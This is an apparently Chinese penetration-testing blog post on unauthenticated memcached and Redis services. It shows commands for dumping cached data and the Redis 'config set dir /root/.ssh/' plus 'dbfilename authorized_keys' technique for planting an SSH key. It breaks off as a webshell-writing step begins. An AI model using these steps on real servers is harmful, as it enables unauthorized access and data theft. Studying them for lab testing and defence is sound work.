<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="未授权访问漏洞总结11211端口–memcache漏洞介绍Memcached 是一套常用的 key-value 缓存系统，由于它本身没有权限控制模块，所以对公网开放的 Memcache 服务很容易被攻击者扫描发现，攻击者通过命令交互可直接读取 Memcached 中的敏感信息。 漏洞利用telnet直接连接目标端口1telnet xx.xx.xx.xx 11211  1234➜  ~ telnet">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透测试--未授权访问漏洞常见">
<meta property="og:url" content="http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/index.html">
<meta property="og:site_name" content="steady&#39;s blog">
<meta property="og:description" content="未授权访问漏洞总结11211端口–memcache漏洞介绍Memcached 是一套常用的 key-value 缓存系统，由于它本身没有权限控制模块，所以对公网开放的 Memcache 服务很容易被攻击者扫描发现，攻击者通过命令交互可直接读取 Memcached 中的敏感信息。 漏洞利用telnet直接连接目标端口1telnet xx.xx.xx.xx 11211  1234➜  ~ telnet">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902091712669.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902194350551.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902194545161.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902195916508.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201124144533536.png">
<meta property="article:published_time" content="2020-06-14T19:15:09.000Z">
<meta property="article:modified_time" content="2020-11-24T07:15:04.824Z">
<meta property="article:author" content="steady">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902091712669.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>渗透测试--未授权访问漏洞常见</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="steady's blog" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/08/22/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/03/27/Apache_Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&text=渗透测试--未授权访问漏洞常见"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&is_video=false&description=渗透测试--未授权访问漏洞常见"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透测试--未授权访问漏洞常见&body=Check out this article: http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&name=渗透测试--未授权访问漏洞常见&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&t=渗透测试--未授权访问漏洞常见"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">未授权访问漏洞总结</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#11211%E7%AB%AF%E5%8F%A3%E2%80%93memcache"><span class="toc-number">1.0.1.</span> <span class="toc-text">11211端口–memcache</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.0.1.1.</span> <span class="toc-text">漏洞介绍</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">1.0.1.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#telnet%E7%9B%B4%E6%8E%A5%E8%BF%9E%E6%8E%A5%E7%9B%AE%E6%A0%87%E7%AB%AF%E5%8F%A3"><span class="toc-number">1.0.1.2.1.</span> <span class="toc-text">telnet直接连接目标端口</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#nmap%E6%89%AB%E6%8F%8F"><span class="toc-number">1.0.1.2.2.</span> <span class="toc-text">nmap扫描</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4"><span class="toc-number">1.0.1.3.</span> <span class="toc-text">常用指令</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6379%E7%AB%AF%E5%8F%A3%E2%80%93Redis"><span class="toc-number">1.0.2.</span> <span class="toc-text">6379端口–Redis</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Redis%E7%AE%80%E4%BB%8B%E5%8F%8A%E6%90%AD%E5%BB%BA%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">1.0.2.1.</span> <span class="toc-text">Redis简介及搭建实验环境</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Redis%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3"><span class="toc-number">1.0.2.2.</span> <span class="toc-text">Redis默认端口</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%9E%E6%8E%A5Redis%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-number">1.0.2.3.</span> <span class="toc-text">连接Redis服务器</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Redis%E7%89%B9%E7%82%B9"><span class="toc-number">1.0.2.4.</span> <span class="toc-text">Redis特点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%91%BD%E4%BB%A4"><span class="toc-number">1.0.2.5.</span> <span class="toc-text">常见命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%BF%AE%E6%94%B9"><span class="toc-number">1.0.2.6.</span> <span class="toc-text">配置文件修改</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-1"><span class="toc-number">1.0.2.7.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#linux"><span class="toc-number">1.0.2.7.1.</span> <span class="toc-text">linux</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B8%8E%E9%98%B2%E5%BE%A1"><span class="toc-number">1.0.2.7.1.1.</span> <span class="toc-text">redis未授权访问漏洞利用与防御</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#ssh-%E7%99%BB%E5%BD%95%E2%80%93%E5%85%AC%E9%92%A5%E7%99%BB%E5%BD%95"><span class="toc-number">1.0.2.7.2.</span> <span class="toc-text">ssh 登录–公钥登录</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">1.0.2.7.3.</span> <span class="toc-text">利用</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#ssh-keygen%E5%85%AC%E9%92%A5%E7%84%B6%E5%90%8E%E4%BD%BF%E7%94%A8%E7%A7%81%E9%92%A5%E7%99%BB%E9%99%86"><span class="toc-number">1.0.2.7.4.</span> <span class="toc-text">ssh-keygen公钥然后使用私钥登陆</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%BE%80web%E7%89%A9%E7%90%86%E8%B7%AF%E5%BE%84%E5%86%99webshell"><span class="toc-number">1.0.2.7.5.</span> <span class="toc-text">往web物理路径写webshell</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">1.0.2.7.6.</span> <span class="toc-text">防御</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.0.2.7.6.1.</span> <span class="toc-text">redis主从复制漏洞</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E4%B8%8Egopger%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.0.2.7.6.2.</span> <span class="toc-text">redis与gopger协议</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#windows"><span class="toc-number">1.0.2.7.7.</span> <span class="toc-text">windows</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E9%99%90%E5%88%B6"><span class="toc-number">1.0.2.7.7.1.</span> <span class="toc-text">限制</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B8%8E%E9%98%B2%E5%BE%A1-1"><span class="toc-number">1.0.2.7.7.2.</span> <span class="toc-text">redis未授权访问漏洞利用与防御</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8080%E7%AB%AF%E5%8F%A3%E2%80%93Jenkins"><span class="toc-number">1.0.3.</span> <span class="toc-text">8080端口–Jenkins</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">1.0.3.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-2"><span class="toc-number">1.0.3.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E9%AA%8C%E8%AF%81"><span class="toc-number">1.0.3.2.1.</span> <span class="toc-text">漏洞验证</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%86%99shell"><span class="toc-number">1.0.3.2.2.</span> <span class="toc-text">未授权访问写shell</span></a></li></ol></li></ol></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        渗透测试--未授权访问漏洞常见
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">steady</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-06-14T19:15:09.000Z" itemprop="datePublished">2020-06-15</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="未授权访问漏洞总结"><a href="#未授权访问漏洞总结" class="headerlink" title="未授权访问漏洞总结"></a>未授权访问漏洞总结</h1><h3 id="11211端口–memcache"><a href="#11211端口–memcache" class="headerlink" title="11211端口–memcache"></a>11211端口–memcache</h3><h4 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h4><p>Memcached 是一套常用的 key-value 缓存系统，由于它本身没有权限控制模块，所以对公网开放的 Memcache 服务很容易被攻击者扫描发现，攻击者通过命令交互可直接读取 Memcached 中的敏感信息。</p>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><h5 id="telnet直接连接目标端口"><a href="#telnet直接连接目标端口" class="headerlink" title="telnet直接连接目标端口"></a>telnet直接连接目标端口</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">telnet xx.xx.xx.xx 11211</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ telnet ip 11211</span><br><span class="line">Trying ip...</span><br><span class="line">Connected to ip.</span><br><span class="line">Escape character is &#39;^]&#39;.</span><br></pre></td></tr></table></figure>

<h5 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV  -p 端口 --script memcached-info IP</span><br><span class="line">Starting Nmap <span class="number">7.80</span> ( https:<span class="comment">//nmap.org ) at 2020-11-16 17:56 CST</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> ip</span><br><span class="line">Host is up (<span class="number">0.54</span>s latency).</span><br><span class="line"></span><br><span class="line">PORT      STATE SERVICE   VERSION</span><br><span class="line"><span class="number">11211</span>/tcp open  memcached Memcached <span class="number">1.4</span><span class="number">.13</span> (uptime <span class="number">27164261</span> seconds)</span><br><span class="line">| memcached-info:</span><br><span class="line">|   Process ID: <span class="number">1121</span></span><br><span class="line">|   Uptime: <span class="number">27164262</span> seconds</span><br><span class="line">|   Server time: <span class="number">2020</span><span class="number">-11</span><span class="number">-16</span>T09:<span class="number">43</span>:<span class="number">25</span></span><br><span class="line">|   Architecture: <span class="number">64</span> bit</span><br><span class="line">|   Used CPU (user): <span class="number">1792.059996</span></span><br><span class="line">|   Used CPU (system): <span class="number">2583.961487</span></span><br><span class="line">|   Current connections: <span class="number">7</span></span><br><span class="line">|   Total connections: <span class="number">8070135</span></span><br><span class="line">|   Maximum connections: <span class="number">1024</span></span><br><span class="line">|   TCP Port: <span class="number">11211</span></span><br><span class="line">|   UDP Port: <span class="number">0</span></span><br><span class="line">|_  Authentication: no</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https:<span class="comment">//nmap.org/submit/ .</span></span><br><span class="line">Nmap done: <span class="number">1</span> IP address (<span class="number">1</span> host up) scanned in <span class="number">15.20</span> seconds</span><br></pre></td></tr></table></figure>

<h4 id="常用指令"><a href="#常用指令" class="headerlink" title="常用指令"></a>常用指令</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">stats &#x2F;&#x2F;查看memcache 服务状态 </span><br><span class="line">stats items &#x2F;&#x2F;查看所有items </span><br><span class="line">stats cachedump 32 0 &#x2F;&#x2F;获得缓存key </span><br><span class="line">get :state:264861539228401373:261588 &#x2F;&#x2F;通过key读取相应value ，获得实际缓存内容，造成敏感信息泄露</span><br></pre></td></tr></table></figure>

<h3 id="6379端口–Redis"><a href="#6379端口–Redis" class="headerlink" title="6379端口–Redis"></a>6379端口–Redis</h3><h4 id="Redis简介及搭建实验环境"><a href="#Redis简介及搭建实验环境" class="headerlink" title="Redis简介及搭建实验环境"></a>Redis简介及搭建实验环境</h4><p>REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。它通常被称为数据结构服务器，因为值（value）可以是字符串(String), 哈希(Map), 列表(list), 集合(sets) 和有序集合(sorted sets)等类型。</p>
<h4 id="Redis默认端口"><a href="#Redis默认端口" class="headerlink" title="Redis默认端口"></a>Redis默认端口</h4><p>Redis默认配置端口为6379，sentinel.conf配置器端口为26379</p>
<p>默认的配置是使用6379端口，没有密码。这时候会导致未授权访问然后使用redis权限写文件。</p>
<h4 id="连接Redis服务器"><a href="#连接Redis服务器" class="headerlink" title="连接Redis服务器"></a>连接Redis服务器</h4><p>（1）交互式方式</p>
<p>redis-cli -h {host} -p {port}方式连接，然后所有的操作都是在交互的方式实现，不需要再执行redis-cli了，例如命令：redis-cli -h 127.0.0.1-p 6379，加-a参数表示带密码的访问。</p>
<p>（2）命令方式<br>redis-cli -h {host} -p {port} {command}直接得到命令的返回结果.</p>
<h4 id="Redis特点"><a href="#Redis特点" class="headerlink" title="Redis特点"></a>Redis特点</h4><ul>
<li>随时执行“save”命令将当前redis的数据保存到硬盘上，另外redis也会根据配置自动存储数据到硬盘上。</li>
<li>dir 指定的是redis的“工作路径”，之后生成的RDB和AOF文件都会存储在这里。</li>
<li>dbfilename RDB文件名，默认为“dump.rdb”</li>
<li>appendonly 是否开启AOF</li>
</ul>
<h4 id="常见命令"><a href="#常见命令" class="headerlink" title="常见命令"></a>常见命令</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;root&#x2F;.ssh&#x2F; 指定本地数据库存放目录</span><br><span class="line">config set dbfilename authorized_keys 指定本地数据库文件名，默认值为 dump.rdb</span><br></pre></td></tr></table></figure>

<p>（1）查看信息：info<br>（2）删除所有数据库内容：flushall<br>（3）刷新数据库：flushdb<br>（4）看所有键：KEYS *，使用select num可以查看键值数据。<br>（5）设置变量：set test “who am i”<br>（6）config set dir dirpath 设置路径等配置<br>（7）config get dir/dbfilename 获取路径及数据配置信息<br>（8）save保存<br>（9）get 变量，查看变量名称</p>
<h4 id="配置文件修改"><a href="#配置文件修改" class="headerlink" title="配置文件修改"></a>配置文件修改</h4><p>bind 127.0.0.1前面加上#号 </p>
<p>protected-mode设为no</p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902091712669.png" alt="image-20200902091712669"></p>
<p>默认的配置是使用6379端口，没有密码。</p>
<p>查看是否开放成功</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ netstat -ant | grep 6379</span><br><span class="line">tcp4       0      0  127.0.0.1.6379         *.*                    LISTEN</span><br></pre></td></tr></table></figure>

<h4 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><h5 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h5><h6 id="redis未授权访问漏洞利用与防御"><a href="#redis未授权访问漏洞利用与防御" class="headerlink" title="redis未授权访问漏洞利用与防御"></a>redis未授权访问漏洞利用与防御</h6><ul>
<li><h5 id="ssh-登录–公钥登录"><a href="#ssh-登录–公钥登录" class="headerlink" title="ssh 登录–公钥登录"></a>ssh 登录–公钥登录</h5><p>公钥登就是需要公钥文件，用户把公钥上传在远程服务器上，用户登录之后服务器发送一串随机数字给客户端，客户端使用私钥进行加密然后发送给服务端，服务端使用公钥进行解密。</p>
<p>使用ssh-keygen生成公钥，在生成的过程中对私钥设置口令（passphrase），如果担心私钥的安全，这里可以设置一个。</p>
<p>运行结束以后，在 $HOME/.ssh/目录下，会新生成两个文件：id_rsa.pub 和 id_rsa。前者是你的公钥，后者是你的私钥。</p>
<p>通常这时再输入下面的命令，将公钥传送到远程主机 host 上面：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-copy-id user@host</span><br></pre></td></tr></table></figure>

<p>authorized_keys 文件，远程主机将用户的公钥，保存在登录后的用户主目录的$HOME/.ssh/authorized_keys 文件中。公钥就是一段字符串，只要把它追加在 authorized_keys 文件的末尾就行了。</p>
</li>
<li><h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h5><p>Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下(Redis 的默认配置)，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。</p>
<ul>
<li><h5 id="ssh-keygen公钥然后使用私钥登陆"><a href="#ssh-keygen公钥然后使用私钥登陆" class="headerlink" title="ssh-keygen公钥然后使用私钥登陆"></a>ssh-keygen公钥然后使用私钥登陆</h5><ol>
<li>Redis服务使用ROOT账号启动</li>
<li>服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。</li>
</ol>
</li>
<li><h5 id="往web物理路径写webshell"><a href="#往web物理路径写webshell" class="headerlink" title="往web物理路径写webshell"></a>往web物理路径写webshell</h5><p>当redis权限不高时，并且服务器开着web服务，在redis有web目录写权限时，可以尝试往web路径写webshell。</p>
<p>写入shell</p>
<p>前提：</p>
<p>1、开启web服务</p>
<p>2、对web服务有写入权限</p>
<p>3、知道web目录</p>
<p>kali开启redis服务</p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902194350551.png" alt="image-20200902194350551"></p>
<p>mac尝试连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ &#x2F;Applications&#x2F;MxSrvs&#x2F;bin&#x2F;redis&#x2F;bin&#x2F;redis-cli -h 192.168.195.130</span><br></pre></td></tr></table></figure>

<p>查看系统信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">192.168.195.130:6379&gt; info</span><br></pre></td></tr></table></figure>

<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902194545161.png" alt="image-20200902194545161"></p>
<p>尝试写shell</p>
